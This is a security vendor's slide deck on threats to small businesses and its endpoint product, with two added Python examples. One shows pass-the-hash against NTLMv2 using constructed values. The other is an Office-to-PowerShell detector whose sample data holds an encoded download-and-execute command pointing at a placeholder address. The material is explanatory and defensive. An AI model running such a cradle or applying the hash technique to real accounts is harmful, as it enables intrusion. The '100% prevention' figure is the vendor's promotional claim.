Next-Generation Threats Targeting SMEs and Countermeasures
trapmine.com
5 CYBER THREATS TARGETING SMEs
• Advanced Persistent Threat
• An advanced persistent threat (APT) is an attack in which an unauthorized user gains access to a system or network and remains there for an extended period of time without being detected.
• Spear Phishing
• Spear phishing is the act of sending emails to specific, well-researched targets while purporting to be a trusted sender. The aim is either to infect devices with malware or to convince victims to hand over information or money.
• Unknown and Known Malware
• Known malware has already been seen and catalogued. Unknown malware is just that: malware that has not been discovered yet. Attacks that use it are known as zero-day attacks.
• Pass-the-Hash Attacks
• A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then presents that hash directly for authentication, typically over NTLM, potentially gaining lateral access to other networked systems. Because the authentication protocol only ever uses the hash, possessing the hash is as good as knowing the password.
• Ransomware
• Ransomware is malicious software that infects your computer and displays messages demanding that a fee be paid in order for your system to work again. This class of malware is a criminal money-making scheme that can be installed through deceptive links in an email message, instant message or website.
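Why the Pass-the-Hash bullet above holds, shown as an added example that is not part of the original deck or of TRAPMINE: the NTLMv2 challenge-response (MS-NLMP) is keyed with the NT hash, which is MD4 over the UTF-16LE password, so an attacker holding only the hash produces exactly the response the server expects. MD4 is implemented inline because OpenSSL 3 builds of hashlib often lack it. The user name, domain, password, server challenge and client blob are constructed demo values, and the blob omits the AV_PAIR target-info section for brevity; both are assumptions of this example.

```python
"""Pass-the-Hash demo: NTLMv2 needs the NT hash, never the password (added example)."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Needed because the NT hash is MD4 over the UTF-16LE password."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                          # round 1
            a = rotl((a + f(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c                  # rotate so each step updates the next word
        for i in range(16):                          # round 2
            a = rotl((a + g(b, c, d) + X[r2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 3
            a = rotl((a + h(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & mask, (B + b) & mask, (C + c) & mask, (D + d) & mask
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: what the SAM / domain controller store, and what LSASS keeps in memory."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP 3.3.2. Inputs are the NT *hash*, user, domain and the challenge."""
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()


# Constructed demo values (not captured traffic). Blob layout: RespType, HiRespType,
# 6 reserved bytes, 8-byte timestamp, 8-byte client challenge, 4 reserved bytes;
# the AV_PAIR target info that follows in real NTLMv2 is omitted here (assumption).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4


def pass_the_hash_demo() -> dict:
    """Server, legitimate client and attacker all compute the same proof from the hash alone."""
    user, domain, password = "alice", "CORP", "password"       # constructed identity
    stored = nt_hash(password)                                   # the DC holds this, not the password
    expected = ntlmv2_proof(stored, user, domain, SERVER_CHALLENGE, CLIENT_BLOB)
    legit = ntlmv2_proof(nt_hash(password), user, domain, SERVER_CHALLENGE, CLIENT_BLOB)
    attacker = ntlmv2_proof(stored, user, domain, SERVER_CHALLENGE, CLIENT_BLOB)   # hash dumped from LSASS
    wrong = ntlmv2_proof(nt_hash("hunter2"), user, domain, SERVER_CHALLENGE, CLIENT_BLOB)
    return {
        "nt_hash": stored.hex(),
        "legit_accepted": hmac.compare_digest(expected, legit),
        "attacker_accepted": hmac.compare_digest(expected, attacker),
        "wrong_hash_accepted": hmac.compare_digest(expected, wrong),
    }


if __name__ == "__main__":
    for k, v in pass_the_hash_demo().items():
        print(f"{k}: {v}")
```

The attacker never learns the password, yet `attacker_accepted` is true because the server only ever checks possession of the hash. That is why defenses concentrate on keeping hashes out of reach (Windows Credential Guard for LSASS, unique local administrator passwords via LAPS, the Protected Users group, which disables NTLM for its members) and on detecting NTLM logons between workstations that have no business talking to each other.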
ANATOMY OF MODERN THREATS
Attack chain (figure): user opens a Word document → the MS Office document exploits a vulnerability → PowerShell scripts/malware execute → final stage: finds and extracts data.
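The chain above is visible in process-creation telemetry: an Office application spawning a script host, an encoded PowerShell command, and a download cradle inside it. The following is an added example, not TRAPMINE code, that runs that detection logic over constructed events shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the field names, the marker lists and the ATT&CK mapping are assumptions of this example.

```python
"""Detect Office -> PowerShell -> download cradle from process-create events (added example)."""
import base64
import binascii
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRADLE_MARKERS = ("net.webclient", "downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "iex ", "invoke-expression", "frombase64string")
# ATT&CK mapping (assumed for this example): T1204.002 User Execution: Malicious File,
# T1059.001 Command and Scripting Interpreter: PowerShell.
TECHNIQUES = {"office_spawned_script_host": "T1204.002",
              "encoded_command": "T1059.001",
              "download_cradle": "T1059.001"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind -e/-ec/-enc/-EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand, which is why a
    plain regex on '-enc' misses '-e' and '-ec'; '-ep' / '-ex' must not match.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if not t.startswith(("-", "/")):
            continue
        flag = t[1:]
        if flag == "ec" or (flag and "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze(events):
    """Flag events that match any stage of the chain; return one finding per event."""
    findings = []
    for idx, ev in enumerate(events):
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        reasons = []
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            reasons.append("office_spawned_script_host")
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is not None:
            reasons.append("encoded_command")
        haystack = (ev["CommandLine"] + " " + (decoded or "")).lower()
        if any(m in haystack for m in CRADLE_MARKERS):
            reasons.append("download_cradle")
        if reasons:
            severity = "high" if reasons != ["encoded_command"] else "medium"
            findings.append({"event": idx, "parent": parent, "child": child, "reasons": reasons,
                             "severity": severity, "decoded": decoded,
                             "techniques": sorted({TECHNIQUES[r] for r in reasons})})
    return findings


# Constructed sample telemetry (not real logs). 203.0.113.5 is a documentation address.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": WINWORD,
     "CommandLine": f'"{WINWORD}" /n "C:\\Users\\alice\\Downloads\\invoice.docm"'},
    {"ParentImage": WINWORD, "Image": POWERSHELL,
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"ParentImage": WINWORD, "Image": r"C:\Windows\splwow64.exe",          # benign print helper
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,      # admin script, not flagged
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["severity"], f["parent"], "->", f["child"], f["reasons"], f["techniques"])
        print("  decoded:", f["decoded"])
```

Only the second event is reported: Word spawning PowerShell, an encoded command, and a `Net.WebClient.DownloadString` cradle inside it. The benign Word child (`splwow64.exe`) and the administrator's `-ExecutionPolicy Bypass` script produce nothing, which is the point of keying the first rule on the parent process rather than on PowerShell alone.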
WHY DO TRADITIONAL SECURITY SOLUTIONS FAIL?
NEXT-GENERATION ENDPOINT SECURITY
• Detection and Response
• Prevent Known and Unknown Malware
• Prevent Non-Malware Attacks
• Endpoint Visibility
• Cloud Intelligence and Machine Learning
• Lightweight and Easy-to-Deploy
TRAPMINE v4.0: NEXT-GENERATION ENDPOINT SECURITY
▪ Multi-Vectoral Malware Engine
▪ Reputational Detection Engine
▪ Machine Learning/AI Based Detection Engine
▪ Behavioral Detection Engine
▪ Detection Analysis
▪ Root Cause Analysis
▪ Related Alert Analysis
▪ Attack Timeline Analysis
▪ MITRE ATT&CK® Integration
▪ Advanced Detection and Protection Policies
▪ Device Controller Policies
▪ Device Controller Logs
▪ Application Control Policies
▪ Blacklist Policies
▪ Whitelist Policies
▪ Compromise Assessment
▪ Live Hunting
▪ Automated Hunting
▪ Anti-Exploit and Advanced Threat Protection
BEHAVIORAL ANALYSIS
ARTIFICIAL INTELLIGENCE
Machine-learning training loop (figure): accumulating samples (malicious files, benign files) → extract features → train model → model → evaluate in real life → update features, and repeat.
THREAT HUNTING AND INCIDENT RESPONSE
Live Query Artifacts:
• Running Processes
• File by Name
• File by Hash
• Registry Values
• OS Startup Entries
• PowerShell v3+ History
• Active Mutexes and Events
• Injected Threads
• ... more
Architecture (figure): TRAPMINE ESM (THREAT HUNTING and INCIDENT RESPONSE MODULE) ↔ TRAPMINE Agents (Desktops, Notebooks, Servers, etc.)
• Live Request, example: Running Processes
• Live Response, example: smss.exe, csrss.exe, wininit.exe, services.exe, lsass.exe, svchost.exe, WUDFHost.exe
• Live Action, examples: Kill Process, Block Process, Download Process, Get Process Dump
INDEPENDENT TEST RESULTS
Prevention efficacy: 100%
• TRAPMINE achieves 100% prevention against in-the-wild and custom threats!*
• TRAPMINE has been certified by UK-based independent test lab MRG-Effitas for its effective protection against cyber threats.*
* https://www.mrg-effitas.com/wp-content/uploads/2017/08/MRG-Effitas-Trapmine_v105.pdf
* https://www.mrg-effitas.com/wp-content/uploads/2018/08/TRAPMINE_ML_report.pdf
THE FIRST DOMESTIC (TURKISH) SOLUTION INTEGRATED INTO GOOGLE VIRUSTOTAL
We welcome Trapmine scanner to VirusTotal. In the words of the company:
“Trapmine ThreatScore is a machine learning-powered malware detection engine developed to identify known and never-before-seen malware. This engine is a part of TRAPMINE Endpoint Detection & Protection Platform. Trapmine combines machine learning, behavior monitoring and endpoint deception techniques to provide fool-proof defense against malware, exploit attempts, file-less malware, ransomware and other forms of targeted attacks. Windows PE files submitted to VirusTotal will be analyzed by Trapmine ML engine and the verdicts will be displayed to VirusTotal users.”
Trapmine has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by MRG Effitas, an AMTSO-member tester.